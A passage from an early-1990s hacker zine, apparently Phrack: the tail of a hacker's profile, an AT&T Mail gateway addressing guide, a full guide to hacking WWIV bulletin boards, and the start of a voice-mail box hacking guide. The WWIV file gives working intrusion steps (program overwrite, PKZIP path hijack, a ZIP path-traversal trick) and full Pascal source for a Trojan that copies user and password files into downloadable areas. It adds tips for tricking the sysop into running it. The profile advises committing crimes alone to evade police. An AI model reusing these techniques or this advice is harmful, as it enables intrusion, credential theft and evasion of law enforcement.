Had all of the original cDc and other bizarre text
|
|||
|
files, occasionally some new Apple warez.
|
|||
|
|
|||
|
Lunatic Labs Still up and still great.
|
|||
|
|
|||
|
Metal Shop Private Perhaps one of the best boards of all time.
|
|||
|
Run by Taran King and had a healthy, yet
|
|||
|
secure userlog. It was a closed system, the
|
|||
|
only way to get on was to know somebody.
|
|||
|
Everyone on the system knew each other in
|
|||
|
some sense.
|
|||
|
|
|||
|
World of Cryton One of the first boards to have a "philter" and to
|
|||
|
really push the messages as far as codes, accounts,
|
|||
|
card numbers, etc. This was also the demise, along
|
|||
|
with many of the 414 hackers.
|
|||
|
|
|||
|
Misc
|
|||
|
~~~
|
|||
|
|
|||
|
2600 Magazine How could I not like a magazine that published
|
|||
|
articles I wrote? This really is a great magazine
|
|||
|
and anyone who is interested in computers, privacy,
|
|||
|
or cyber-issues in general should subscribe.
|
|||
|
|
|||
|
Fame...? Was in the movie "Hoosiers" (thanks for bringing
|
|||
|
that up, Shark!), even though I'm not a basketball
|
|||
|
fan. Met Dennis Hopper, etc. Went to school with
|
|||
|
a lot of famous people's kids. Most have some
|
|||
|
pretty serious problems. Be glad you are who you
|
|||
|
are.
|
|||
|
|
|||
|
Marriage...? I'm single and will do everything I can to stay
|
|||
|
that way. When people ask me about getting married
|
|||
|
I tell them that the idea of car payments scare me.
|
|||
|
I enjoy having girlfriends, but I've become too
|
|||
|
independent. I still run around at bars until
|
|||
|
sometimes 3:00am or so, but still manage to spend
|
|||
|
about 50 or 60 hours a week at work. Even if I cut
|
|||
|
out the bar scene, I wouldn't have much time to
|
|||
|
spend with someone else on a daily basis.
|
|||
|
|
|||
|
Advice If you ever get into doing illegal things, make
|
|||
|
sure you do them by yourself. Your chances of
|
|||
|
getting caught when you do things solo and resist
|
|||
|
the temptation to "brag" about them is minimal.
|
|||
|
When someone else knows about what you have done,
|
|||
|
it doesn't matter how good of a friend they are.
|
|||
|
If they get into trouble, you are going to the
|
|||
|
sacrificial lamb when it comes to negotiating their
|
|||
|
freedom. Even the strongest willed individuals
|
|||
|
seem to crumble when questioned by police.
|
|||
|
Groups are bad news. There are very little
|
|||
|
advantages to being in a group and all it does is
|
|||
|
increase your personal risk by multitudes.
|
|||
|
Cracking groups aren't nearly as dangerous, but
|
|||
|
they DO bring boards down. Look to the fate of
|
|||
|
groups such as LOD for examples of group fate. Lex
|
|||
|
Luthor, perhaps one of the most elusive and private
|
|||
|
hackers of all time was the one to bring down the
|
|||
|
rest of the group. This was tough for me, as many
|
|||
|
of the members were people I talked with and could
|
|||
|
really feel for.
|
|||
|
|
|||
|
Don't get discouraged in life if you feel that you
|
|||
|
are behind the rest because you don't come from a
|
|||
|
rich family or have the best equipment. I left
|
|||
|
home when I was 17 years old, keeping only minimal
|
|||
|
contact with my parents since then and lived life
|
|||
|
pretty well, using my abilities to "smooth talk"
|
|||
|
and pure enthusiasm to walk into about any job.
|
|||
|
Don't put people down -- everyone has something to
|
|||
|
teach you, even the bum on the street might be able
|
|||
|
to tell you how to make some free phone calls!
|
|||
|
There is a wealth of information to be found via
|
|||
|
Usenet, text files, or even your school or public
|
|||
|
library. Stay informed and well read.
|
|||
|
|
|||
|
Email I always enjoy hearing from people. Reach me via
|
|||
|
the Internet at douglas@netcom.com, or on Lunatic
|
|||
|
Labs BBS.
|
|||
|
|
|||
|
________________________________________________________________________________
|
|||
|
|
|||
|
|
|||
|
==Phrack Inc.==
|
|||
|
Volume Three, Issue Thirty-four, File #4 of 11
|
|||
|
_______________________
|
|||
|
|| ||
|
|||
|
|| The AT&T Mail Gateway ||
|
|||
|
|| ||
|
|||
|
|| December 19, 1990 ||
|
|||
|
|| ||
|
|||
|
|| by Robert Alien ||
|
|||
|
||_______________________||
|
|||
|
|
|||
|
The Internet Gateway
|
|||
|
~~~~~~~~~~~~~~~~~~~
|
|||
|
The Internet Gateway provides Internet e-mail users with a method of
|
|||
|
communication to AT&T Mail. The Interconnect consists of various private
|
|||
|
email networks and uses an addressing format better know as Domain Addressing
|
|||
|
Service (DAS).
|
|||
|
|
|||
|
A domain address consists of a user name, followed by an @ sign and/or % sign
|
|||
|
and a domain name, which is usually the system name.
|
|||
|
|
|||
|
Example:
|
|||
|
|
|||
|
jdoe@attmail.com
|
|||
|
|
|||
|
Sending Email to Internet Users
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
To send email from the AT&T MailService to the Internet community use the UUCP
|
|||
|
addressing style.
|
|||
|
|
|||
|
Example:
|
|||
|
|
|||
|
internet!system.domain!username
|
|||
|
|
|||
|
Translates to:
|
|||
|
|
|||
|
internet!gnu.ai.mit.edu!jdoe
|
|||
|
|
|||
|
If you are sending e-mail to an Internet user whose e-mail address may be in
|
|||
|
the RFC 822 format (user@domain), you must translate the RFC address before
|
|||
|
sending your message to an Internet recipient.
|
|||
|
|
|||
|
username@system.domain (Internet user's address)
|
|||
|
|
|||
|
internet!system.domain!username (to a UUCP address)
|
|||
|
|
|||
|
Example:
|
|||
|
username%system2@system.domain (Internet user's address)
|
|||
|
|
|||
|
Translates to:
|
|||
|
internet!system.domain!system2!username
|
|||
|
|
|||
|
Sending Email From The Internet
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
To send email to the AT&T Mail Service, Internet users can choose either the
|
|||
|
RFC 822 or UUCP addressing style. The Internet recognizes attmail.com as the
|
|||
|
domain identifier for AT&T Mail when electronic messages are sent through the
|
|||
|
gateway. Although many Internet users choose to send e-mail using the RFC 822
|
|||
|
addressing style, the UUCP style is also available on many UNIX systems on the
|
|||
|
Internet, but not every system supports UUCP. Below are examples of both
|
|||
|
addressing styles:
|
|||
|
|
|||
|
RFC 822 Addressing: username@attmail.com
|
|||
|
|
|||
|
Example:
|
|||
|
|
|||
|
jsmith@attmail.com
|
|||
|
|
|||
|
UUCP Addressing: attmail.com!username
|
|||
|
|
|||
|
Example:
|
|||
|
|
|||
|
attmail.com!jdoe
|
|||
|
|
|||
|
Although email can be sent through the Internet gateway, surcharged services,
|
|||
|
such as Telex, FAX, COD, U.S. Mail, overnight, urgent mail and messages
|
|||
|
destined to other ADMDs connected to AT&T Mail are not deliverable. If you are
|
|||
|
an Internet e-mail user attempting to use a surcharged service and are not
|
|||
|
registered on AT&T Mail, you will not be able to send your message, and will be
|
|||
|
automatically notified. Below is a list of surcharged services that are
|
|||
|
unavailable to Internet users.
|
|||
|
|
|||
|
* FAX
|
|||
|
* Telex
|
|||
|
* COD
|
|||
|
* U.S. Mail
|
|||
|
* Overnight
|
|||
|
* Administrative Management Domain (ADMD) Messages
|
|||
|
|
|||
|
Sending Email to Bitnet Users
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
To send email to BITNET users from AT&T Mail, enter:
|
|||
|
|
|||
|
internet!host.bitnet!user
|
|||
|
|
|||
|
Sending Email to UUNET Users
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
To send email to UUNET users from AT&T Mail via the Internet Gateway, enter:
|
|||
|
|
|||
|
attmail!internet!uunet!system!user
|
|||
|
|
|||
|
Internet Restrictions
|
|||
|
~~~~~~~~~~~~~~~~~~~~
|
|||
|
The following commercial restrictions apply to the use of the Internet Gateway.
|
|||
|
|
|||
|
* Users are prohibited to use the Internet to carry traffic between commercial
|
|||
|
(for profit) electronic messaging systems.
|
|||
|
|
|||
|
* Advertising and soliciting i.e., messages offering goods or services for sale
|
|||
|
or offers of jobs.
|
|||
|
|
|||
|
* Provision of for-profit service, other than electronic messaging to Internet
|
|||
|
users, is permitted (e.g., database services) if such service is used for
|
|||
|
scholarly research purposes and its costs are borne by individual or
|
|||
|
institutional subscription.
|
|||
|
_______________________________________________________________________________
|
|||
|
|
|||
|
|
|||
|
==Phrack Inc.==
|
|||
|
|
|||
|
Volume Three, Issue Thirty-four, File #5 of 11
|
|||
|
|
|||
|
*** ***
|
|||
|
*** ***
|
|||
|
*** The Complete Guide ***
|
|||
|
*** to Hacking WWIV ***
|
|||
|
*** ***
|
|||
|
*** by Inhuman ***
|
|||
|
*** September 1991 ***
|
|||
|
*** ***
|
|||
|
*** ***
|
|||
|
|
|||
|
WWIV is one of the most popular BBS programs in the country. With
|
|||
|
thousands of boards in WWIVnet and hundreds in the spinoff WWIVlink, there is a
|
|||
|
lot of support and community. The nice thing about WWIV is that it is very
|
|||
|
easy to set up. This makes it popular among the younger crowd of sysops who
|
|||
|
can't comprehend the complexities of fossil drivers and batch files. In this
|
|||
|
file, I will discuss four methods of hacking WWIV to achieve sysop access and
|
|||
|
steal the user and configuration files. Just remember the number one rule
|
|||
|
of hacking: Don't destroy, alter, or create files on someone else's computer,
|
|||
|
unless it's to cover your own trail. Believe me, there is nothing lower than
|
|||
|
the scum who hack BBSes for the sheer pleasure of formatting someone else's
|
|||
|
hard drive. But there is nothing wrong (except legally) with hacking a system
|
|||
|
to look at the sysop's files, get phone numbers, accounts, etc. Good luck.
|
|||
|
|
|||
|
***
|
|||
|
*** Technique #1: The Wildcard Upload
|
|||
|
***
|
|||
|
|
|||
|
This technique will only work on a board running an unregistered
|
|||
|
old version of DSZ and a version of WWIV previous to v4.12. It is all
|
|||
|
based on the fact that if you do a wildcard upload (*.*), whatever file you
|
|||
|
upload will go into the same directory as DSZ.COM, which is often the main BBS
|
|||
|
directory. So there are several methods of hacking using this technique.
|
|||
|
|
|||
|
If the sysop is running an unmodified version of WWIV, you can simply
|
|||
|
compile a modded version of it with a backdoor and overwrite his copy. Your
|
|||
|
new copy will not be loaded into memory until the BBS either shrinks out (by
|
|||
|
running an onliner or something), or the sysop terminates the BBS and runs it
|
|||
|
again.
|
|||
|
|
|||
|
You can also have some fun with two strings that WWIV always recognizes at
|
|||
|
the NN: prompt: "!@-NETWORK-@!" and "!@-REMOTE-@!". The first is used by
|
|||
|
WWIVnet to tell the BBS that it is receiving a net call. If the BBS is part of
|
|||
|
a network and you type "!@-NETWORK-@!", it will then wait for the network
|
|||
|
password and other data. If the board is not part of a network, it will just
|
|||
|
act like you typed an invalid user name. The second string is reserved for
|
|||
|
whatever programs people wanted to write for WWIV, like an off-line reader or
|
|||
|
whatever. Snarf (the file leeching utility) uses this. If there is not a
|
|||
|
REMOTE.EXE or REMOTE.COM in the main BBS directory, it will also act as if you
|
|||
|
entered an invalid user name. So, what you can do is wildcard upload either
|
|||
|
REMOTE.COM or NETWORK.COM. You want to call them COM files, because if the EXE
|
|||
|
files already exist, the COM ones will be called first. If the BBS is part of
|
|||
|
a network, you should go for REMOTE.COM, because if you do NETWORK.COM, it will
|
|||
|
screw up network communications and the sysop will notice a lot faster. Of
|
|||
|
course, if you're going straight in for the kill, it doesn't matter.
|
|||
|
|
|||
|
So, what should NETWORK.COM or REMOTE.COM actually be? you ask. Well, you
|
|||
|
can try renaming COMMAND.COM to one of those two, which would make a DOS shell
|
|||
|
for you when it was executed. This is tricky, though, because you need to know
|
|||
|
his DOS version. I suggest a batch file, compiled to a COM file using PC Mag's
|
|||
|
BAT2EXEC. You can make the batch file have one line:
|
|||
|
|
|||
|
\COMMAND
|
|||
|
|
|||
|
That way you don't have to worry about DOS versions.
|
|||
|
|
|||
|
Remember that this method of hacking WWIV is almost completely obsolete.
|
|||
|
It is just included for reference, or for some old board run from an empty
|
|||
|
house where the sysop logs on twice a year or something.
|
|||
|
|
|||
|
***
|
|||
|
*** Technique #2: The PKZIP Archive Hack
|
|||
|
***
|
|||
|
|
|||
|
Probably the most vulnerable part of WWIV is the archive section. This
|
|||
|
section allows users to unZIP files to a temporary directory and ZIP the files
|
|||
|
you want into a temporary ZIP file, then download it. This is useful if you
|
|||
|
download a file from another board, but one file in it is corrupted. This way
|
|||
|
you don't have to re-download the whole file. Anyway, on with the show. Make
|
|||
|
a zip file that contains a file called PKZIP.BAT or COM or EXE. It doesn't
|
|||
|
matter. This file will be executed, so make it whatever you want, just like in
|
|||
|
Technique #1. Make it COMMAND.COM, or a batch file, or a HD destroyer,
|
|||
|
whatever you want. So you upload this file, and then type "E" to extract it.
|
|||
|
|
|||
|
It'll ask you what file to extract and you say the name of the file you just
|
|||
|
uploaded. It'll then say "Extract What? " and you say "*.*". It'll then unzip
|
|||
|
everything (your one file) into the TEMP directory. Then go to the archive
|
|||
|
menu ("G") and pick "A" to add a file to archive. It'll ask what file you want
|
|||
|
to add, and say anything, it doesn't matter. At this point it will try to
|
|||
|
execute the command:
|
|||
|
|
|||
|
PKZIP TEMP.ZIP \TEMP\%1
|
|||
|
|
|||
|
Where %1 is what you just entered. The file pointer is already pointing
|
|||
|
to the temp directory, so instead of executing PKZIP from the DOS path, it'll
|
|||
|
execute the file sitting in the current directory, TEMP. So then it runs PKZIP
|
|||
|
and you get your DOS shell or whatever.
|
|||
|
If PKZIP does not work, you may want to try uploading another file, and
|
|||
|
use the same technique, but instead make it an ARC file and call the file in
|
|||
|
the archive PKPAK.
|
|||
|
|
|||
|
This technique is relatively easy to defeat from the sysop's end, but
|
|||
|
often they are too lazy, or just haven't heard about it.
|
|||
|
|
|||
|
***
|
|||
|
*** Technique #3: The -D Archive Hack
|
|||
|
***
|
|||
|
|
|||
|
This technique also plays on the openness of WWIV's archive system. This
|
|||
|
is another method of getting a file into the root BBS directory, or anywhere on
|
|||
|
the hard drive, for that matter.
|
|||
|
|
|||
|
First, create a temporary directory on your hard drive. It doesn't matter
|
|||
|
what it's called. We'll call it TEMP. Then, make a sub-directory of TEMP
|
|||
|
called AA. It can actually be called any two-character combination, but we'll
|
|||
|
keep it nice and simple. Then make a subdirectory of AA called WWIV.
|
|||
|
|
|||
|
Place NETWORK.COM or REMOTE.COM or whatever in the directory
|
|||
|
\TEMP\AA\WWIV. Then from the TEMP directory execute the command:
|
|||
|
|
|||
|
PKZIP -r -P STUFF.ZIP <--- The case of "r" and "P" are important.
|
|||
|
|
|||
|
This will create a zip file of all the contents of the directories, but
|
|||
|
with all of the directory names recursed and stored. So if you do a PKZIP -V
|
|||
|
to list the files you should see AA\WWIV\REMOTE.COM, etc.
|
|||
|
|
|||
|
Next, load STUFF.ZIP into a hex editor, like Norton Utilities, and search
|
|||
|
for "AA". When you find it (it should occur twice), change it to "C:". It is
|
|||
|
probably a good idea to do this twice, once with the subdirectory called WWIV,
|
|||
|
and another with it called BBS, since those are the two most common main BBS
|
|||
|
directory names for WWIV. You may even want to try D: or E: in addition to C:.
|
|||
|
You could even work backwards, by forgetting the WWIV subdirectory, and just
|
|||
|
making it AA\REMOTE.COM, and changing the "AA" to "..". This would be
|
|||
|
foolproof. You could work from there, doing "..\..\DOS\PKZIP.COM" or whatever.
|
|||
|
|
|||
|
Then upload STUFF.ZIP (or whatever you want to call it) to the BBS, and
|
|||
|
type "E" to extract it to a temporary directory. It'll ask you what file.
|
|||
|
Type "STUFF.ZIP". It'll ask what you want to extract. Type """-D". It'll
|
|||
|
then execute:
|
|||
|
|
|||
|
PKUNZIP STUFF.ZIP ""-D
|
|||
|
|
|||
|
It will unzip everything into the proper directory. Voila. The quotation
|
|||
|
marks are ignored by PKUNZIP and are only there to trip up WWIV v4.20's check
|
|||
|
for the hyphen. This method can only be defeated by modifying the source code,
|
|||
|
or taking out the calls to any PKZIP or PKUNZIP programs in INIT, but then you
|
|||
|
lose your archive section.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
***
|
|||
|
*** Technique #4: The Trojan Horse File-Stealer
|
|||
|
***
|
|||
|
|
|||
|
This method, if executed properly, is almost impossible to defeat, and
|
|||
|
will conceivably work on any BBS program, if you know the directory structure
|
|||
|
well enough. Once again, you need PC Mag's BAT2EXEC, or enough programming
|
|||
|
experience to write a program that will copy files from one place to another.
|
|||
|
The basic principle is this: You get the sysop to run a program that you
|
|||
|
upload. This program copies \WWIV\DATA\USER.LST and \WWIV\CONFIG.DAT *over*
|
|||
|
files that already exist in the transfer or gfiles area. You then go download
|
|||
|
those files and you have the two most important files that exist for WWIV.
|
|||
|
Now, you need to do a certain amount of guess-work here. WWIV has it's
|
|||
|
directories set up like this:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
--- TEMP
|
|||
|
I --- DIR1
|
|||
|
I I
|
|||
|
I--- DLOADS---I--- DIR2
|
|||
|
I I
|
|||
|
I --- DIR3
|
|||
|
WWIV--I--- DATA
|
|||
|
I --- GDIR1
|
|||
|
I I
|
|||
|
I--- GFILES---I--- GDIR2
|
|||
|
I I
|
|||
|
I --- GDIR3
|
|||
|
--- MSGS
|
|||
|
|
|||
|
|
|||
|
The sysop sets the names for the DIR1, DIR2, etc. Often you have names
|
|||
|
like UPLOADS, GAMES, UTILS, etc. For the gfile dirs you might have GENERAL,
|
|||
|
HUMOR, whatever.
|
|||
|
|
|||
|
So you have to make a guess at the sysop's directory names. Let's say he
|
|||
|
never moves his files from the upload directory. Then do a directory list from
|
|||
|
the transfer menu and pick two files that you don't think anyone will download.
|
|||
|
Let's say you see:
|
|||
|
|
|||
|
RABBIT .ZIP 164k : The History of Rabbits from Europe to the U.S.
|
|||
|
SCD .COM 12k : SuperCD - changes dirs 3% faster than DOS's CD!
|
|||
|
|
|||
|
So you then might write a batch file like this:
|
|||
|
|
|||
|
@ECHO OFF
|
|||
|
COPY \WWIV\DATA\USER.LST \WWIV\DLOADS\UPLOADS\RABBIT.ZIP
|
|||
|
COPY \BBS\DATA\USER.LST \BBS\DLOADS\UPLOADS\RABBIT.ZIP
|
|||
|
COPY \WWIV\CONFIG.DAT \WWIV\DLOADS\UPLOADS\SCD.COM
|
|||
|
COPY \BBS\CONFIG.DAT \BBS\DLOADS\UPLOADS\SCD.COM
|
|||
|
|
|||
|
You'd then compile it to a COM file and upload it to the sysop directory.
|
|||
|
Obviously this file is going to be pretty small, so you have to make up
|
|||
|
plausible use for it. You could say it's an ANSI screen for your private BBS,
|
|||
|
and the sysop is invited. This is good if you have a fake account as the
|
|||
|
president of some big cracking group. You wouldn't believe how gullible some
|
|||
|
sysops are. At any rate, use your imagination to get him to run the file. And
|
|||
|
make it sound like he shouldn't distribute it, so he won't put it in some
|
|||
|
public access directory.
|
|||
|
|
|||
|
There is a problem with simply using a batch file. The output will look
|
|||
|
like:
|
|||
|
|
|||
|
1 file(s) copied.
|
|||
|
File not found.
|
|||
|
1 file(s) copied.
|
|||
|
File not found.
|
|||
|
|
|||
|
That might get him curious enough to look at it with a hex editor, which
|
|||
|
would probably blow everything. That's why it's better to write a program in
|
|||
|
your favorite language to do this. Here is a program that searches specified
|
|||
|
drives and directories for CONFIG.DAT and USER.LST and copies them over the
|
|||
|
files of your choice. It was written in Turbo Pascal v5.5:
|
|||
|
|
|||
|
Program CopyThisOverThat;
|
|||
|
|
|||
|
{ Change the dir names to whatever you want. If you change the number of
|
|||
|
locations it checks, be sure to change the "num" constants as well }
|
|||
|
|
|||
|
uses dos;
|
|||
|
|
|||
|
const
|
|||
|
NumMainDirs = 5;
|
|||
|
MainDirs: array[1..NumMainDirs] of string[8] = ('BBS','WWIV','WORLD',
|
|||
|
'BOARD','WAR');
|
|||
|
NumGfDirs = 3;
|
|||
|
GFDirs: array[1..NumGFDirs] of string[8] = ('DLOADS','FILES','UPLOADS');
|
|||
|
NumSubGFDirs = 2;
|
|||
|
SubGFDirs: array[1..NumSubGFDirs] of string[8] = ('UPLOADS','MISC');
|
|||
|
|
|||
|
NumDirsToTest = 3;
|
|||
|
DirsToTest: array[1..NumDirsToTest] of string[3] = ('C:\','D:\','E:\');
|
|||
|
{ok to test for one that doesn't exist}
|
|||
|
|
|||
|
{Source file names include paths from the MAIN BBS subdir (e.g. "BBS") }
|
|||
|
|
|||
|
SourceFileNames: array[1..2] of string[25] = ('DATA\USER.LST','DATA\CONFIG.DA
|
|||
|
T');
|
|||
|
|
|||
|
{ Dest file names are from subgfdirs }
|
|||
|
|
|||
|
DestFileNames: array[1..2] of string[12] = ('\BDAY.MOD','\TVK.ZIP');
|
|||
|
|
|||
|
var
|
|||
|
p, q, r, x, y, dirN: byte;
|
|||
|
bigs: word;
|
|||
|
CurDir, BackDir: string[80];
|
|||
|
f1, f2: file;
|
|||
|
Info: pointer;
|
|||
|
ok: boolean;
|
|||
|
|
|||
|
Procedure Sorry;
|
|||
|
|
|||
|
var
|
|||
|
x, y: integer;
|
|||
|
begin
|
|||
|
for y := 1 to 1000 do
|
|||
|
for x := 1 to 100 do
|
|||
|
;
|
|||
|
Writeln;
|
|||
|
Writeln ('<THIS IS DISPLAYED WHEN FINISHED>'); {change to something like }
|
|||
|
Writeln; {Abnormal program termination}
|
|||
|
ChDir(BackDir);
|
|||
|
Halt;
|
|||
|
end;
|
|||
|
|
|||
|
begin
|
|||
|
|
|||
|
Write ('<THIS IS DISPLAYED WHILE SEARCHING>'); {change to something like }
|
|||
|
|
|||
|
{$I-} {Loading...}
|
|||
|
|
|||
|
GetDir (0, BackDir);
|
|||
|
ChDir('\');
|
|||
|
for dirn := 1 to NumDirsToTest do
|
|||
|
begin
|
|||
|
ChDir(DirsToTest[dirn]);
|
|||
|
if IOResult = 0 then
|
|||
|
begin
|
|||
|
for p := 1 to NumMainDirs do
|
|||
|
begin
|
|||
|
ChDir (MainDirs[p]);
|
|||
|
if (IOResult <> 0) then
|
|||
|
begin
|
|||
|
if (p = NumMainDirs) and (dirn = NumDirsToTest) then
|
|||
|
Sorry;
|
|||
|
end else begin
|
|||
|
p := NumMainDirs;
|
|||
|
for q := 1 to NumGFDirs do
|
|||
|
begin
|
|||
|
ChDir (GFDirs[q]);
|
|||
|
if (IOResult <> 0) then
|
|||
|
begin
|
|||
|
if (q = NumGFDirs) and (dirn=NumdirsToTest) then
|
|||
|
Sorry;
|
|||
|
end else begin
|
|||
|
q := NumGFDirs;
|
|||
|
for r := 1 to NumSubGFDirs do
|
|||
|
begin
|
|||
|
ChDir (SubGFDirs[r]);
|
|||
|
if (IOResult <> 0) then
|
|||
|
begin
|
|||
|
if r = NumSubGFDirs then
|
|||
|
Sorry;
|
|||
|
end else begin
|
|||
|
r := NumSubGFDirs;
|
|||
|
dirn := NumDirsToTest;
|
|||
|
ok := true;
|
|||
|
end;
|
|||
|
end;
|
|||
|
end;
|
|||
|
end;
|
|||
|
end;
|
|||
|
end;
|
|||
|
end;
|
|||
|
end;
|
|||
|
GetDir (0, CurDir);
|
|||
|
ChDir ('..');
|
|||
|
ChDir ('..');
|
|||
|
for x := 1 to 2 do
|
|||
|
begin
|
|||
|
Assign (f1, SourceFileNames[x]);
|
|||
|
Assign (f2, CurDir+DestFileNames[x]);
|
|||
|
Reset (f1, 1);
|
|||
|
if IOResult <> 0 then
|
|||
|
begin
|
|||
|
if x = 2 then
|
|||
|
Sorry;
|
|||
|
end else begin
|
|||
|
ReWrite (f2, 1);
|
|||
|
Bigs := FileSize(f1);
|
|||
|
GetMem(Info, Bigs);
|
|||
|
BlockRead(f1, Info^, Bigs);
|
|||
|
BlockWrite (f2, Info^, Bigs);
|
|||
|
FreeMem(Info, Bigs);
|
|||
|
end;
|
|||
|
end;
|
|||
|
Sorry;
|
|||
|
end.
|
|||
|
|
|||
|
So hopefully the sysop runs this program and emails you with something
|
|||
|
like "Hey it didn't work bozo!". Or you could make it work. You could
|
|||
|
actually stick a BBS ad in the program or whatever. It's up to you. At any
|
|||
|
rate, now you go download those files that it copied the USER.LST and
|
|||
|
CONFIG.DAT over. You can type out the CONFIG.DAT and the first word you see in
|
|||
|
all caps is the system password. There are several utilities for WWIV that let
|
|||
|
you compile the USER.LST to a text file. You can find something like that on a
|
|||
|
big WWIV board, or you can try to figure it out with a text or hex editor. At
|
|||
|
any rate, once you have those two files, you're in good shape.
|
|||
|
|
|||
|
You could also use a batch file like that in place of one that calls
|
|||
|
COMMAND.COM for something like REMOTE.COM. It's up to you.
|
|||
|
|
|||
|
***
|
|||
|
*** Hacking Prevention
|
|||
|
***
|
|||
|
|
|||
|
So you are the sysop of a WWIV board, and are reading this file with
|
|||
|
growing dismay. Have no fear, if you have patience, almost all of these
|
|||
|
methods can be fixed.
|
|||
|
|
|||
|
To eliminate the wildcard upload, all you have to do it get a current copy
|
|||
|
of WWIV (4.20), and the latest version of DSZ. It's all been fixed. To fix
|
|||
|
the PKZIP archive hack, simply specify a path in INIT in all calls to PKZIP,
|
|||
|
PKUNZIP, PKPAK, PKUNPAK, and any other archive programs you have. So your
|
|||
|
command lines should look like:
|
|||
|
|
|||
|
\DOS\PKZIP -V %1
|
|||
|
|
|||
|
Or something similar. That will fix that nicely. To eliminate the -D
|
|||
|
method, you have to make some modifications to the source code if you want to
|
|||
|
keep your archive section. Goose, sysop of the Twilight Zone BBS in VA,
|
|||
|
puts out a NOHACK mod, which is updated regularly. It fixes ALL of these
|
|||
|
methods except the last. The latest version of NOHACK is v2.4. If you are a
|
|||
|
WWIV sysop, put it in.
|
|||
|
|
|||
|
I can think of two ways to stop the last method, but neither of them are
|
|||
|
easy, and both require source code modifications. You could keep track of the
|
|||
|
filesize of a file when it's uploaded. Then when someone goes to download it,
|
|||
|
you could check the actual filesize with the size when it was uploaded. If
|
|||
|
they differ, it wouldn't let you download it. You could do the same with the
|
|||
|
date. Although either method could be gotten around with enough patience.
|
|||
|
|
|||
|
For a virtually unhackable system, voice validate all users, have all
|
|||
|
uploads go to the sysop directory so you can look over them first, and don't
|
|||
|
run any programs. Of course, this is very tedious, but that is the price
|
|||
|
of a secure BBS.
|
|||
|
|
|||
|
***
|
|||
|
*** Thanks
|
|||
|
***
|
|||
|
|
|||
|
Thanks to Fenris Wolf for teaching me about the -D method, to Steve
|
|||
|
for help with the CopyThisOverThat program, and to Insight for proofing this
|
|||
|
file.
|
|||
|
|
|||
|
*******************************************************************************
|
|||
|
|
|||
|
==Phrack Inc.==
|
|||
|
|
|||
|
Volume Three, Issue Thirty-four, File #6 of 11
|
|||
|
|
|||
|
|
|||
|
HACKING VOICE MAIL SYSTEMS
|
|||
|
|
|||
|
by Night Ranger
|
|||
|
|
|||
|
|
|||
|
DISCLAIMER
|
|||
|
|
|||
|
I, Night Ranger, or anyone else associated with Phrack, am not responsible
|
|||
|
for anything the readers of this text may do. This file is for informational
|
|||
|
and educational purposes only and should not be used on any system or network
|
|||
|
without written permission of the authorized persons in charge.
|
|||
|
|
|||
|
|
|||
|
INTRODUCTION
|
|||
|
|
|||
|
I decided to write this text file because I received numerous requests for
|
|||
|
vmbs from people. Vmbs are quite easy to hack, but if one doesn't know where
|
|||
|
to start it can be hard. Since there aren't any decent text files on this
|
|||
|
subject, I couldn't refer them to read anything, and decided to write one
|
|||
|
myself. To the best of my knowledge, this is the most complete text on
|
|||
|
hacking vmb systems. If you have any comments or suggestions, please let me
|
|||
|
know.
|
|||
|
|
|||
|
Voice Mail Boxes (vmbs) have become a very popular way for hackers to get in
|
|||
|
touch with each other and share information. Probably the main reason for
|
|||
|
this is their simplicity and availability. Anyone can call a vmb regardless
|
|||
|
of their location or computer type. Vmbs are easily accessible because most
|
|||
|
are toll free numbers, unlike bulletin boards. Along with their advantages,
|
|||
|
they do have their disadvantages. Since they are easily accessible this
|
|||
|
means not only hackers and phreaks can get information from them, but feds
|
|||
|
and narcs as well. Often they do not last longer than a week when taken
|
|||
|
improperly. After reading this file and practicing the methods described,
|
|||
|
you should be able to hack voice mail systems with ease. With these thoughts
|
|||
|
in mind, let's get started.
|
|||
|
|
|||
|
|
|||
|
FINDING A VMB SYSTEM
|
|||
|
|
|||
|
The first thing you need to do is find a VIRGIN (unhacked) vmb system. If
|
|||
|
you hack on a system that already has hackers on it, your chance of finding
|
|||
|
a box is considerably less and it increases the chance that the system
|
|||
|
administrator will find the hacked boxes. To find a virgin system, you need
|
|||
|
to SCAN some 800 numbers until you find a vmb. A good idea is to take the
|
|||
|
number of a voice mail system you know, and scan the same exchange but not
|
|||
|
close to the number you have.
|
|||
|
|
|||
|
|
|||
|
FINDING VALID BOXES ON THE SYSTEM
|
|||
|
|
|||
|
If you get a high quality recording (not an answering machine) then it is
|
|||
|
probably a vmb system. Try entering the number 100, the recording should
|
|||
|
stop. If it does not, you may have to enter a special key (such as '*' '#'
|
|||
|
'8' or '9') to enter the voice mail system. After entering 100 it should
|
|||
|
either connect you to something or do nothing. If it does nothing, keep
|
|||
|
entering (0)'s until it does something. Count the number of digits you
|
|||
|
entered and this will tell you how many digits the boxes on the system are.
|
|||
|
You should note that many systems can have more than one box length depending
|
|||
|
on the first number you enter, Eg. Boxes starting with a six can be five
|
|||
|
digits while boxes starting with a seven can only be four. For this file we
|
|||
|
will assume you have found a four digit system, which is pretty common. It
|
|||
|
should do one of the following things...
|
|||
|
|
|||
|
1) Give you an error message, Eg. 'Mailbox xxxx is invalid.'
|
|||
|
2) Ring the extension and then one of the following..
|
|||
|
1) Someone or no one answers.
|
|||
|
2) Connects you to a box.
|
|||
|
3) Connect you to mailbox xxxx.
|
|||
|
|
|||
|
If you get #1 then try some more numbers. If you get #2 or #3 then you have
|
|||
|
found a valid vmb (or extension in the case of 2-1). Extensions usually have
|
|||
|
a vmb for when they are not at their extension. If you get an extension,
|
|||
|
move on. Where you find one box you will probably find more surrounding it.
|
|||
|
Sometimes a system will try to be sneaky and put one valid vmb per 10 numbers.
|
|||
|
Eg. Boxes would be at 105, 116, 121, ... with none in between. Some systems
|
|||
|
start boxes at either 10 after a round number or 100 after, depending on
|
|||
|
whether it is a three or four box system. For example, if you do not find
|
|||
|
any around 100, try 110 and if you do not find any around 1000 try 1100. The
|
|||
|
only way to be sure is to try EVERY possible box number. This takes time but
|
|||
|
can be worth it.
|
|||
|
|
|||
|
Once you find a valid box (even if you do not know the passcode) there is a
|
|||
|
simple trick to use when scanning for boxes outside of a vmb so that it does
|
|||
|
not disconnect you after three invalid attempts. What you do is try two box
|
|||
|
numbers and then the third time enter a box number you know is valid. Then
|
